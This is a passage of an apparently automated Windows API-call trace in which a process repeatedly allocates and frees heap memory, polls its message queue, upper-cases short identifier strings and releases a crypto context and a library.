| out: lpMsg=0x8bf4b0) returned 0 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0166.267] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0166.268] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.268] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0166.268] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.268] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.268] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.268] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0166.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.268] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.269] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.269] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.269] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.269] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.269] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0166.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.269] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.270] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.270] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0166.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.270] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0166.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.271] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0166.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.271] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.271] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.271] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.271] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.271] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.271] FreeLibrary (hLibModule=0x74d40000) returned 1 [0166.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0166.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0166.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.271] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.272] CloseHandle (hObject=0x170) returned 1 [0166.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0166.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0166.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0166.274] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0166.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0166.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0166.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0166.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0166.278] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0166.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, 